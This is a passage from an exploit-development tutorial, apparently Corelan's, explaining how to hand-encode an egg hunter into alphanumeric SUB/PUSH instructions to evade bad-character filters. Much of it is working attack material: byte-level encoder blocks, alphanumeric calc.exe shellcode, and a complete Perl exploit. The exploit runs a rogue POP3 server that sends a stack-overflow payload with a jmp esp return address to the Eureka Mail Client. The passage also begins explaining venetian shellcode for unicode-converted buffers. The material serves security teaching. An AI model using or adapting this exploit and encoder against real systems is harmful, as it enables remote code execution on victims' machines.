:<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\">2D 314D5555      SUB EAX,55554D31\n2D 314B5555      SUB EAX,55554B31\n2D 35515555      SUB EAX,55555135\n50               PUSH EAX\n41               INC ECX\n41               INC ECX<\/pre>\n<p>(The value that is calculated in EAX is going to be important later on !\u00a0 I\u2019ll get back to this in a minute)<\/p>\n<p>&nbsp;<\/p>\n<p>Then, EAX is cleared again (2 AND operations), and using the 3 SUB instructions on EAX, a value is pushed onto the stack.<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image32.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb32.png\" alt=\"image\" width=\"666\" height=\"244\" border=\"0\" \/><\/a><\/p>\n<p>So before SUB EAX,55555521 is run, EAX = 00000000.\u00a0 When 
the first SUB ran, EAX contains AAAAAADF. After the second SUB, EAX contains 555556BE, and after the third SUB, EAX contains E7FFE775.\u00a0 Then, this value is pushed onto the stack.<\/p>\n<p>Wait a minute. This value looks familiar to me. 0xE7, 0xFF, 0xE7, 0x75 are in fact the last 4 bytes of the NtAccessCheckAndAuditAlarm egg hunter (in reversed order).\u00a0 Nice.<\/p>\n<p>If you continue to run the code, you\u2019ll see that it will reproduce the original egg hunter. (but in my testcase, using a different exploit, the code does not work)<\/p>\n<p>Anyways, the code muts used is in fact an encoder that will reproduce the original egg hunter, put it on the stack, and will run the reproduced code, effectively bypassing bad char limitations (because the entire custom made encoder did not use any of the bad chars.) Simply genial !\u00a0 I had never seen an implementation of this encoder before this particular exploit was published. Really well done muts !<\/p>\n<p>Of course, if the AND, PUSH, POP, SUB, INC opcodes are in the list of badchars as well, then you may have a problem, but you can play with the values for the SUB instructions in order to reproduce the original egg hunter, keep track of the current location where the egghunter is reproduced (on the stack) and finally \u201cjump\u201d to it.<\/p>\n<p>How is the jump made ?<\/p>\n<p>If you have to deal with a limited character set (only alphanumerical ascii-printable characters allowed for example), then a jmp esp, or push esp+ret, \u2026 won\u2019t work because these instructions may contain invalid characters. If you don\u2019t have to deal with these characters, then simply add a jump at the end of the encoded hunter and you\u2019re all set.<\/p>\n<p>Let\u2019s assume that the character set is limited, so we must find another way to solve this.\u00a0 Remember when I said earlier that certain instructions were going to be important ?\u00a0 Well this is where it will come into play. 
If we cannot make the jump, we need to make sure the code starts executing automatically. The best way to do this is by writing the decoded egg hunter right after the encoded code\u2026 so when the encoded code finished reproducing the original egg hunter, it would simply start executing this reproduced egg hunter.<\/p>\n<p>That means that a value must be calculated, pointing to a location after the encoded hunter, and this value must be put in ESP before starting to decode. This way, the decoder will rebuild the egg hunter and place it right after the encoded hunter.\u00a0 We\u2019ll have a closer look at this in the next chapter.<\/p>\n<p>&nbsp;<\/p>\n<h4>Seeing this code run and reproduce the original egghunter is nice, but how can you build your own decoder ?<\/h4>\n<p>The framework for building the encoded egghunter (or decoder if that\u2019s what you want to call it) looks like this :<\/p>\n<p>- set up the stack &amp; registers (calculate where the decoded hunter must be written. This will be the local position + length of the encoded code (which will be more or less the same size). Calculating where the decoder must be written to requires you to evaluate the registers when the encoded hunter would start running. If you have made your way to the encoded hunter via a jmp esp, then esp will contain the current location, and you can simply increase the value until it points to the right location. )<\/p>\n<p>- reproduce each 4 bytes of the original egg hunter on the stack, right after the encoded hunter (using 2 AND\u2019s to clear out EAX, 3 SUBs to reproduce the original bytes, and a PUSH to put the reproduced code on the stack)<\/p>\n<p>- When all bytes have been reproduced, the decoded egg hunter should kick in.<\/p>\n<p>First, let\u2019s build the encoder for the egghunter itself.\u00a0 You have to start by grouping the egg hunter in sets of 4 bytes. 
We have to start with the last 4 bytes of the code (because we will push values to the stack each time we reproduce the original code... so at the end, the first bytes will be on top) Our NtAccessCheckAndAuditAlarm egg hunter is 32 bytes, so that\u2019s nicely aligned.\u00a0 But if it\u2019s not aligned, you can add more bytes (nops) to the bottom of the original egg hunter, and start bottom up, working in 4 byte groups.<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\">\\x66\\x81\\xCA\\xFF\n\\x0F\\x42\\x52\\x6A\n\\x02\\x58\\xCD\\x2E\n\\x3C\\x05\\x5A\\x74\n\\xEF\\xB8\\<strong><span style=\"color: #ff0000;\">x77\\x30<\/span><\/strong>   ;w0\n<strong><span style=\"color: #ff0000;\">\\x30\\x74<\/span><\/strong>\\x8B\\xFA   ;0t\n\\xAF\\x75\\xEA\\xAF\n\\x75\\xE7\\xFF\\xE7<\/pre>\n<p>The code used by muts will effectively reproduce the egghunter (using W00T as tag). After the code has run, this is what is pushed on the stack :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image49.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb49.png\" alt=\"image\" width=\"347\" height=\"170\" border=\"0\" \/><\/a><\/p>\n<p>Nice.<\/p>\n<p>2 questions remain however : how do we jump to that egg hunter now, and what if you have to write the encoded egg hunter yourself ?\u00a0 Let\u2019s look at how it\u2019s done :<\/p>\n<p>Since we have 8 lines of 4 bytes of egg hunter code, you will end up with 8 blocks of encoded code. 
The entire code should only use alphanumeric ascii-printable characters, and should not use any of the bad chars.\u00a0 (check <a title=\"http:\/\/www.asciitable.com\/\" href=\"http:\/\/www.asciitable.com\/\">http:\/\/www.asciitable.com\/<\/a>)\u00a0 The printable characters start at 0x20 (space) or 0x21, and end at 0x7E<\/p>\n<p>Each block is used to reproduce 4 bytes of egg hunter code, using SUB instructions. The way to calculate the values to use in the SUB instructions is this :<\/p>\n<p>Take one line of egg hunter code, reverse the bytes !, and get its 2\u2019s complement (take all bits, invert them, and add one) (Using Windows calculator, set it to hex\/dword, and calculate \u201c0 - value\u201d). For the last line of the egg hunter code (0x75E7FFE7 -&gt; 0xE7FFE775) this would be 0x1800188B (= 0 - E7FFE775).<\/p>\n<p>Then find 3 values that only use alphanumeric characters (ascii-printable), and are not using any of the bad chars (\\x40\\x3f\\x3a\\x2f)\u2026 and when you sum up these 3 values, you should end up at the 2\u2019s complement value (0x1800188B in case of the last line) again.\u00a0 (by the way, thanks <em>ekse<\/em> for working with me finding the values in the list below \ud83d\ude42 That was fun !)<\/p>\n<p>The resulting 3 values are the ones that must be used in the sub eax,&lt;\u2026&gt; instructions.<\/p>\n<p>Since bytes will be pushed to the stack, you have to start with the last line of the egg hunter first (and don\u2019t forget to reverse the bytes of the code), so after the last push to the stack, the first bytes of the egg hunter would be located at ESP.<\/p>\n<p>In order to calculate the 3 values, I usually do this :<\/p>\n<p>- calculate the 2\u2019s complement of the reversed bytes<\/p>\n<p>- start with the first bytes in the 2\u2019s complement. 
(18 in this case), and look for 3 values that, when you add them together, they will sum up to 18.\u00a0 You may have to overflow in order to make it work (because you are limited to ascii-printable characters).\u00a0 So simply using 06+06+06 won\u2019t work as 06 is not a valid character.\u00a0 In that case, we need to overflow and go to 118.\u00a0 I usually start by taking a value somewhere between 55 (3 times 55 = 0 again)\u00a0 and 7F (last character). Take for example 71.\u00a0 Add 71 to 71 = E2.\u00a0 In order to get from E2 to 118, we need to add 36, which is a valid character, so we have found our first bytes (see red).\u00a0 This may not be the most efficient method to do this, but it works.\u00a0 (Tip : windows calc : type in the byte value you want to get to, divide it by 3 to know in what area you need to start looking)<\/p>\n<p>Then do the same for the next 3 bytes in the 2\u2019s complement.\u00a0 Note : if you have to overflow to get to a certain value, this may impact the next bytes.\u00a0 Just add the 3 values together at the end, and if you had an overflow, you have to subtract one again from one of the next bytes in one of the 3 values.\u00a0 Just try, you\u2019ll see what I mean.\u00a0 (and you will find out why the 3rd value starts with 35 instead of 36)<\/p>\n<p>Last line of the (original) egg hunter :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\">x75 xE7 xFF xE7 -&gt; xE7 xFF xE7 x75: (2\u2019s complement : 0x1800188B)\n-----------------------------------------------------------------\nsub eax, 0x71557130     (=&gt; \"\\x2d\\x30\\x71\\x55\\x71\")  (Reverse again !)\nsub eax, 0x71557130     (=&gt; \"\\x2d\\x30\\x71\\x55\\x71\")\nsub eax, 0x3555362B     (=&gt; \"\\x2d\\x2B\\x36\\x55\\x35\")\n=&gt; sum of these 3 values is 0x11800188B  (or 0x1800188B in dword)<\/pre>\n<p>&nbsp;<\/p>\n<p>Let\u2019s look at the other ones.\u00a0 Second last line of the 
(original) egg hunter :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\">xAF x75 xEA xAF -&gt; xAF xEA x75 xAF: (2\u2019s complement : 0x50158A51)\n-----------------------------------------------------------------\nsub eax, 0x71713071\nsub eax, 0x71713071\nsub eax, 0x6D33296F<\/pre>\n<p>and so on\u2026<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\">x30 x74 x8B xFA -&gt; xFA x8B x74 x30: (2\u2019s complement : 0x05748BD0)\n-----------------------------------------------------------------\nsub eax, 0x65253050\nsub eax, 0x65253050\nsub eax, 0x3B2A2B30<\/pre>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\">xEF xB8 x77 x30 -&gt; x30 x77 xB8 xEF: (2\u2019s complement : 0xCF884711)\n-----------------------------------------------------------------\nsub eax, 0x41307171\nsub eax, 0x41307171\nsub eax, 0x4D27642F<\/pre>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\">x3C x05 x5A x74  -&gt; x74 x5A x05 x3C: (2\u2019s complement : 0x8BA5FAC4)\n------------------------------------------------------------------\nsub eax, 0x30305342\nsub eax, 0x30305341\nsub eax, 0x2B455441<\/pre>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\">x02 x58 xCD x2E -&gt; x2E xCD x58 x02: (2\u2019s complement : 0xD132A7FE)\n-----------------------------------------------------------------\nsub eax, 0x46663054\nsub eax, 0x46663055\nsub eax, 0x44664755<\/pre>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\">x0F x42 x52 x6A -&gt; x6A x52 x42 x0F: (2\u2019s complement : 
0x95ADBDF1)\n-----------------------------------------------------------------\nsub eax, 0x31393E50\nsub eax, 0x32393E50\nsub eax, 0x323B4151<\/pre>\n<p>Finally, the first line :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\">x66 x81 xca xff -&gt; xff xca x81 x66 (2\u2019s complement : 0x00357E9A)\n----------------------------------------------------------------\nsub eax, 0x55703533\nsub eax, 0x55702533\nsub eax, 0x55552434<\/pre>\n<p>&nbsp;<\/p>\n<p>Each of these blocks must be prepended with code that would zero-out EAX :<\/p>\n<p>Example :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\">AND EAX,554E4D4A   (\"\\x25\\x4A\\x4D\\x4E\\x55\")\nAND EAX,2A313235   (\"\\x25\\x35\\x32\\x31\\x2A\")<\/pre>\n<p>(2 times 5 bytes)<\/p>\n<p>Each block must be followed by a push eax (one byte, \u201c\\x50\u201d) instruction which will put the result (one line of egg hunter code) on the stack. Don\u2019t forget about it, or your decoded egg hunter won\u2019t be placed on the stack.<\/p>\n<p>So : each block will be 10 (zero eax) + 15 (decode) + 1 (push eax) = 26 bytes. 
We have 8 blocks, so we have 208 bytes already.<\/p>\n<blockquote><p>Note, when converting the sub eax,&lt;value&gt; instructions to opcode, don\u2019t forget to reverse the bytes of the values again\u2026\u00a0 so sub eax,0x476D556F would become \u201c\\x2d\\x6f\\x55\\x6d\\x47\u201d<\/p><\/blockquote>\n<p>&nbsp;<\/p>\n<p>The next thing that we need to do is make sure that the decoded egg hunter will get executed after it was reproduced.<\/p>\n<p>In order to do so, we need to write it in a predictable location and jump to it, or we need to write it directly after the encoded hunter so it gets executed automatically.<\/p>\n<p>If we can write in a predictable location (because we can modify ESP before the encoded hunter runs), and if we can jump to the beginning of the decoded hunter (ESP) after the encoded hunter has completed, then that will work fine.<\/p>\n<p>Of course, if your character set is limited, then you may not be able to add a \u201cjmp esp\u201d or \u201cpush esp\/ret\u201d or anything like that at the end of the encoded hunter.\u00a0\u00a0\u00a0 If you can - then that\u2019s good news.<\/p>\n<p>If that is not possible, then you will need to write the decoded egg hunter right after the encoded version.\u00a0 So when the encoded version has stopped reproducing the original code, it would start executing it.\u00a0 In order to do this, we must calculate where we should write the decoded egg hunter to.\u00a0 We know the number of bytes in the encoded egg hunter, so we should try to modify ESP accordingly (and do so before the decoding process begins) so the decoded bytes would be written directly after the encoded hunter.<\/p>\n<p>The technique used to modify ESP depends on the available character set.\u00a0 If you can only use ascii-printable characters, then you cannot use add or sub or mov operations on ESP\u2026\u00a0 One method that may work is running a series of POPAD instructions to change ESP and make it point below the end of the encoded hunter.\u00a0 You may 
have to add some nops at the end of the encoded hunter, just to be on the safe side.\u00a0 (\\x41 works fine as nop when you have to use ascii-printable characters only)<\/p>\n<p>Wrap everything up, and this is what you\u2019ll get :<\/p>\n<p>Code to modify ESP (popad) + Encoded hunter (8 blocks : zero out eax, reproduce code, push to stack) + some nops if necessary\u2026<\/p>\n<p>When we apply this technique to the Eureka Mail Client exploit, we get this :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\"><span style=\"color: #0000ff;\">use<\/span> Socket;\n#fill out the <span style=\"color: #0000ff;\">local<\/span> IP or hostname\n#which is used by Eureka EMail as <span style=\"color: #0000ff;\">POP<\/span>3 server\n#note : must be exact match !\n<span style=\"color: #0000ff;\">my<\/span> $localserver = \"<span style=\"color: #8b0000;\">192.168.0.193<\/span>\";\n#calculate <span style=\"color: #0000ff;\">offset<\/span> to EIP\n<span style=\"color: #0000ff;\">my<\/span> $junk = \"<span style=\"color: #8b0000;\">A<\/span>\" x (723 - <span style=\"color: #0000ff;\">length<\/span>($localserver));\n<span style=\"color: #0000ff;\">my<\/span> $ret=<span style=\"color: #0000ff;\">pack<\/span>('V',0x7E47BCAF); #jmp esp from user32.dll\n<span style=\"color: #0000ff;\">my<\/span> $padding = \"<span style=\"color: #8b0000;\">\\x90<\/span>\" x 1000;\n\n#alphanumeric ascii-printable encoded + bad chars\n# tag = w00t\n<span style=\"color: #0000ff;\">my<\/span> $egghunter =\n#popad - make ESP point below the encoded hunter\n\"<span style=\"color: #8b0000;\">\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61<\/span>\".\n#-----8 blocks encoded hunter---------------\n\"<span style=\"color: #8b0000;\">\\x25\\x4A\\x4D\\x4E\\x55<\/span>\".   #zero eax\n\"<span style=\"color: #8b0000;\">\\x25\\x35\\x32\\x31\\x2A<\/span>\".   #\n\"<span style=\"color: #8b0000;\">\\x2d\\x30\\x71\\x55\\x71<\/span>\".   
#x75 xE7 xFF xE7\n\"<span style=\"color: #8b0000;\">\\x2d\\x30\\x71\\x55\\x71<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x2d\\x2B\\x36\\x55\\x35<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x50<\/span>\".                   #<span style=\"color: #0000ff;\">push<\/span> eax\n#--------------------------\n\"<span style=\"color: #8b0000;\">\\x25\\x4A\\x4D\\x4E\\x55<\/span>\".   #zero eax\n\"<span style=\"color: #8b0000;\">\\x25\\x35\\x32\\x31\\x2A<\/span>\".   #\n\"<span style=\"color: #8b0000;\">\\x2d\\x71\\x30\\x71\\x71<\/span>\".   #xAF x75 xEA xAF\n\"<span style=\"color: #8b0000;\">\\x2d\\x71\\x30\\x71\\x71<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x2d\\x6F\\x29\\x33\\x6D<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x50<\/span>\".                   #<span style=\"color: #0000ff;\">push<\/span> eax\n#--------------------------\n\"<span style=\"color: #8b0000;\">\\x25\\x4A\\x4D\\x4E\\x55<\/span>\".   #zero eax\n\"<span style=\"color: #8b0000;\">\\x25\\x35\\x32\\x31\\x2A<\/span>\".   #\n\"<span style=\"color: #8b0000;\">\\x2d\\x50\\x30\\x25\\x65<\/span>\".   #x30 x74 x8B xFA\n\"<span style=\"color: #8b0000;\">\\x2d\\x50\\x30\\x25\\x65<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x2d\\x30\\x2B\\x2A\\x3B<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x50<\/span>\".                   #<span style=\"color: #0000ff;\">push<\/span> eax\n#---------------------------\n\"<span style=\"color: #8b0000;\">\\x25\\x4A\\x4D\\x4E\\x55<\/span>\".   #zero eax\n\"<span style=\"color: #8b0000;\">\\x25\\x35\\x32\\x31\\x2A<\/span>\".   #\n\"<span style=\"color: #8b0000;\">\\x2d\\x71\\x71\\x30\\x41<\/span>\".   #xEF xB8 x77 x30\n\"<span style=\"color: #8b0000;\">\\x2d\\x71\\x71\\x30\\x41<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x2d\\x2F\\x64\\x27\\x4d<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x50<\/span>\".                   
#<span style=\"color: #0000ff;\">push<\/span> eax\n#---------------------------\n\"<span style=\"color: #8b0000;\">\\x25\\x4A\\x4D\\x4E\\x55<\/span>\".   #zero eax\n\"<span style=\"color: #8b0000;\">\\x25\\x35\\x32\\x31\\x2A<\/span>\".   #\n\"<span style=\"color: #8b0000;\">\\x2d\\x42\\x53\\x30\\x30<\/span>\".   #x3C x05 x5A x74\n\"<span style=\"color: #8b0000;\">\\x2d\\x41\\x53\\x30\\x30<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x2d\\x41\\x54\\x45\\x2B<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x50<\/span>\".                   #<span style=\"color: #0000ff;\">push<\/span> eax\n#---------------------------\n\"<span style=\"color: #8b0000;\">\\x25\\x4A\\x4D\\x4E\\x55<\/span>\".   #zero eax\n\"<span style=\"color: #8b0000;\">\\x25\\x35\\x32\\x31\\x2A<\/span>\".   #\n\"<span style=\"color: #8b0000;\">\\x2d\\x54\\x30\\x66\\x46<\/span>\".   #x02 x58 xCD x2E\n\"<span style=\"color: #8b0000;\">\\x2d\\x55\\x30\\x66\\x46<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x2d\\x55\\x47\\x66\\x44<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x50<\/span>\".                   #<span style=\"color: #0000ff;\">push<\/span> eax\n#---------------------------\n\"<span style=\"color: #8b0000;\">\\x25\\x4A\\x4D\\x4E\\x55<\/span>\".   #zero eax\n\"<span style=\"color: #8b0000;\">\\x25\\x35\\x32\\x31\\x2A<\/span>\".   #\n\"<span style=\"color: #8b0000;\">\\x2d\\x50\\x3e\\x39\\x31<\/span>\".   #x0F x42 x52 x6A\n\"<span style=\"color: #8b0000;\">\\x2d\\x50\\x3e\\x39\\x32<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x2d\\x51\\x41\\x3b\\x32<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x50<\/span>\".                   #<span style=\"color: #0000ff;\">push<\/span> eax\n#----------------------------\n\"<span style=\"color: #8b0000;\">\\x25\\x4A\\x4D\\x4E\\x55<\/span>\".   #zero eax\n\"<span style=\"color: #8b0000;\">\\x25\\x35\\x32\\x31\\x2A<\/span>\".   #\n\"<span style=\"color: #8b0000;\">\\x2d\\x33\\x35\\x70\\x55<\/span>\".   
#x66 x81 xCA xFF\n\"<span style=\"color: #8b0000;\">\\x2d\\x33\\x25\\x70\\x55<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x2d\\x34\\x24\\x55\\x55<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x50<\/span>\".                   #<span style=\"color: #0000ff;\">push<\/span> eax\n#------------------------------\n\"<span style=\"color: #8b0000;\">\\x41\\x41\\x41\\x41<\/span>\";       #some nops\n\n#calc.exe\n<span style=\"color: #0000ff;\">my<\/span> $shellcode=\"<span style=\"color: #8b0000;\">\\x89\\xe2\\xda\\xc1\\xd9\\x72\\xf4\\x58\\x50\\x59\\x49\\x49\\x49\\x49<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x43\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30\\x56<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x58\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x42\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x30\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a\\x49\\x4b\\x4c\\x4a<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x48\\x50\\x44\\x43\\x30\\x43\\x30\\x45\\x50\\x4c\\x4b\\x47\\x35\\x47<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4c\\x4c\\x4b\\x43\\x4c\\x43\\x35\\x43\\x48\\x45\\x51\\x4a\\x4f\\x4c<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4b\\x50\\x4f\\x42\\x38\\x4c\\x4b\\x51\\x4f\\x47\\x50\\x43\\x31\\x4a<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4b\\x51\\x59\\x4c\\x4b\\x46\\x54\\x4c\\x4b\\x43\\x31\\x4a\\x4e\\x50<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x31\\x49\\x50\\x4c\\x59\\x4e\\x4c\\x4c\\x44\\x49\\x50\\x43\\x44\\x43<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x37\\x49\\x51\\x49\\x5a\\x44\\x4d\\x43\\x31\\x49\\x52\\x4a\\x4b\\x4a<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x54\\x47\\x4b\\x51\\x44\\x46\\x44\\x43\\x34\\x42\\x55\\x4b\\x55\\x4c<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4b\\x51\\x4f\\x51\\x34\\x45\\x51\\x4a\\x4b\\x42\\x46\\x4c\\x4b\\x44<\/span>\" 
.\n\"<span style=\"color: #8b0000;\">\\x4c\\x50\\x4b\\x4c\\x4b\\x51\\x4f\\x45\\x4c\\x45\\x51\\x4a\\x4b\\x4c<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4b\\x45\\x4c\\x4c\\x4b\\x45\\x51\\x4a\\x4b\\x4d\\x59\\x51\\x4c\\x47<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x54\\x43\\x34\\x48\\x43\\x51\\x4f\\x46\\x51\\x4b\\x46\\x43\\x50\\x50<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x56\\x45\\x34\\x4c\\x4b\\x47\\x36\\x50\\x30\\x4c\\x4b\\x51\\x50\\x44<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4c\\x4c\\x4b\\x44\\x30\\x45\\x4c\\x4e\\x4d\\x4c\\x4b\\x45\\x38\\x43<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x38\\x4b\\x39\\x4a\\x58\\x4c\\x43\\x49\\x50\\x42\\x4a\\x50\\x50\\x42<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x48\\x4c\\x30\\x4d\\x5a\\x43\\x34\\x51\\x4f\\x45\\x38\\x4a\\x38\\x4b<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4e\\x4d\\x5a\\x44\\x4e\\x46\\x37\\x4b\\x4f\\x4d\\x37\\x42\\x43\\x45<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x31\\x42\\x4c\\x42\\x43\\x45\\x50\\x41\\x41<\/span>\";\n\n<span style=\"color: #0000ff;\">my<\/span> $payload=$junk.$ret.$egghunter.$padding.\"<span style=\"color: #8b0000;\">w00tw00t<\/span>\".$shellcode;\n\n#set up listener on port 110\n<span style=\"color: #0000ff;\">my<\/span> $port=110;\n<span style=\"color: #0000ff;\">my<\/span> $proto=<span style=\"color: #0000ff;\">getprotobyname<\/span>('tcp');\n<span style=\"color: #0000ff;\">socket<\/span>(SERVER,PF_INET,SOCK_STREAM,$proto);\n<span style=\"color: #0000ff;\">my<\/span> $paddr=sockaddr_in($port,INADDR_ANY);\n<span style=\"color: #0000ff;\">bind<\/span>(SERVER,$paddr);\n<span style=\"color: #0000ff;\">listen<\/span>(SERVER,SOMAXCONN);\n<span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\">[+] Listening on tcp port 110 [POP3]... 
\\n<\/span>\";\n<span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\">[+] Configure Eureka Mail Client to connect to this host\\n<\/span>\";\n<span style=\"color: #0000ff;\">my<\/span> $client_addr;\nwhile($client_addr=<span style=\"color: #0000ff;\">accept<\/span>(CLIENT,SERVER))\n{\n  <span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\">[+] Client connected, sending evil payload\\n<\/span>\";\n  <span style=\"color: #0000ff;\">my<\/span> $cnt=1;\n  while($cnt&lt;10)\n  {\n     <span style=\"color: #0000ff;\">print<\/span> CLIENT \"<span style=\"color: #8b0000;\">-ERR <\/span>\".$payload.\"<span style=\"color: #8b0000;\">\\n<\/span>\";\n\t <span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\"> -&gt; Sent <\/span>\".<span style=\"color: #0000ff;\">length<\/span>($payload).\"<span style=\"color: #8b0000;\"> bytes\\n<\/span>\";\n\t $cnt=$cnt+1;\n  }\n}\n<span style=\"color: #0000ff;\">close<\/span> CLIENT;\n<span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\">[+] Connection closed\\n<\/span>\";<\/pre>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image50.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb50.png\" alt=\"image\" width=\"377\" height=\"180\" border=\"0\" \/><\/a><\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image51.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb51.png\" alt=\"image\" width=\"379\" height=\"177\" border=\"0\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<blockquote><p>You may or may not be able to use this code in 
your own exploit - after all, this code was handmade and based on a given list of bad chars, the offset required to end up writing after the encoded hunter, and so on.<\/p>\n<p>Just take into account that this code will be (a lot) longer (so you\u2019ll need a bigger buffer) than the unencoded\/original egghunter. The code I used is 220 bytes \u2026<\/p><\/blockquote>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h3>What if your payload is subject to unicode conversion ? (All your 00BB00AA005500EE are belong to us !)<\/h3>\n<p>Good question !<\/p>\n<p>Well, there are 2 scenarios where there may be a way to make this work :<\/p>\n<h4>Scenario 1 : An ascii version of the payload can be found somewhere in memory.<\/h4>\n<p>This sometimes happens and it's worthwhile investigating.\u00a0 When data is accepted by the application in ascii, and stored in memory before it gets converted to unicode, then it may still be stored (and available) in memory when the overflow happens.<\/p>\n<p>A good way to find out if your shellcode is available in ascii is by writing the shellcode to a file, and using the !pvefindaddr compare &lt;filename&gt; feature.\u00a0 If the shellcode can be found, and if it\u2019s not modified\/corrupted\/converted to unicode in memory, the script will report this back to you.<\/p>\n<p>In that scenario, you would need to<\/p>\n<p>- convert the egg hunter into venetian shellcode and get that executed. (The egg hunter code will be a lot bigger than it was when it was just ascii, so available buffer space is important)<\/p>\n<p>- put your real shellcode (prepended with the marker) somewhere in memory. The marker and the shellcode must be in ascii.<\/p>\n<p>When the venetian egghunter kicks in, it would simply locate the ascii version of the shellcode in memory and execute it. 
